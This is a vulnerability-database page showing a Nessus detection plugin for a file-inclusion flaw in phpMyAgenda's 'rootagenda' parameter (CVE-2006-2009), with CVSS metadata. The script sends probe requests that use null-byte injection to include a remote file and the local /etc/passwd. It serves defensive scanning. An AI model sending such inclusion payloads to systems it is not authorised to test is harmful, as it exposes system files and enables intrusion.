Lucene search
This script is Copyright (C) 2006-2022 Ferdy RiphagenPHPMYAGENDA_30FINAL_FILE_INCLUDE.NASLHistoryMay 03, 2006 - 12:00 a.m.
phpMyAgenda rootagenda Parameter File Include Vulnerability
2006-05-0300:00:00
This script is Copyright (C) 2006-2022 Ferdy Riphagen
www.tenable.com
30
CVSS2
7.5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
EPSS
0.194
Percentile
96.4%
phpMyAgenda is installed on the remote system. It’s an open source event management system written in PHP.
The application does not sanitize the ‘rootagenda’ parameter in some of its files. This may allow an attacker to include arbitrary files, possibly taken from third-party systems, and parse them with privileges of the account under which the web server operates.
Successful exploitation of this issue requires that PHP’s ‘register_globals’ setting be enabled.
#%NASL_MIN_LEVEL 70300
#
# Script Written By Ferdy Riphagen
# <f[dot]riphagen[at]nsec[dot]nl>
#
# Script distributed under the GNU GPLv2 License.
#
# Original advisory / discovered by :
# https://www.securityfocus.com/archive/1/431862/30/0/threaded
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(21305);
script_version("1.18");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2006-2009");
script_bugtraq_id(17670);
script_name(english:"phpMyAgenda rootagenda Parameter File Include Vulnerability");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is prone to
remote and local file inclusion attacks.");
script_set_attribute(attribute:"description", value:
"phpMyAgenda is installed on the remote system. It's an open source
event management system written in PHP.
The application does not sanitize the 'rootagenda' parameter in some
of its files. This may allow an attacker to include arbitrary files,
possibly taken from third-party systems, and parse them with
privileges of the account under which the web server operates.
Successful exploitation of this issue requires that PHP's
'register_globals' setting be enabled.");
script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/431862/30/0/threaded");
script_set_attribute(attribute:"solution", value:
"Disable PHP's 'register_globals' setting.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"vuln_publication_date", value:"2006/04/24");
script_set_attribute(attribute:"plugin_publication_date", value:"2006/05/03");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:phpmyagenda:phpmyagenda");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2006-2022 Ferdy Riphagen");
script_dependencies("http_version.nasl");
script_require_keys("www/PHP");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
exit(0);
}
include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("misc_func.inc");
port = get_http_port(default:80, embedded:TRUE);
if (get_kb_item("Services/www/"+port+"/embedded")) exit(0);
if (!can_host_php(port:port)) exit(0);
if (thorough_tests) dirs = list_uniq(make_list("/phpmyagenda", "/agenda", cgi_dirs()));
else dirs = make_list(cgi_dirs());
foreach dir (dirs) {
req = http_get(item:string(dir, "/agenda.php3"), port:port);
#debug_print("request1= ", req, "\n");
res = http_keepalive_send_recv(data:req, bodyonly:TRUE, port:port);
#debug_print("res: ", res, "\n");
if(egrep(pattern:"<a href=[^?]+\?modeagenda=calendar", string:res)) {
file[0] = string("http://", get_host_name(), dir, "/bugreport.txt");
file[1] = "/etc/passwd";
req = http_get(item:string(dir, "/infoevent.php3?rootagenda=", file[0], "%00"), port:port);
#debug_print("request1= ", req, "\n");
recv = http_keepalive_send_recv(data:req, bodyonly:TRUE, port:port);
#debug_print("receive1= ", recv, "\n");
if (recv == NULL) exit(0);
if ("Bug report for phpMyAgenda" >< recv) {
security_hole(port);
exit(0);
}
else {
# Maybe PHP's 'allow_url_fopen' is set to Off on the remote host.
# In this case, try a local file inclusion.
req2 = http_get(item:string(dir, "/infoevent.php3?rootagenda=", file[1], "%00"), port:port);
#debug_print("request2= ", req2, "\n");
recv2 = http_keepalive_send_recv(data:req2, bodyonly:TRUE, port:port);
#debug_print("receive2= ", recv2, "\n");
if (recv2 == NULL) exit(0);
if (egrep(pattern:"root:.*:0:[01]:.*:", string:recv2)) {
# PHP's 'register_globals' and 'magic_quotes_gpc' are enabled on the remote host.
security_hole(port);
exit(0);
}
}
}
}
Related
openvas
openvas
phpMyAgenda 3.0 File Inclusion Vulnerability
2008-08-22 00:00:00
phpMyAgenda version 3.0 File Inclusion Vulnerability
2008-08-22 00:00:00
nvd
nvd
CVE-2006-2009
2006-04-25 12:50:00
CVE-2006-5132
2006-10-03 04:03:00
cve
cve
CVE-2006-2009
2006-04-25 12:50:00
CVE-2006-5132
2006-10-03 04:03:00
cvelist
cvelist
CVE-2006-2009
2006-04-25 10:00:00
CVE-2006-5132
2006-10-02 20:00:00
prion
prion
Remote file inclusion
2006-04-25 12:50:00
CVSS2
7.5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
EPSS
0.194
Percentile
96.4%
Related for PHPMYAGENDA_30FINAL_FILE_INCLUDE.NASL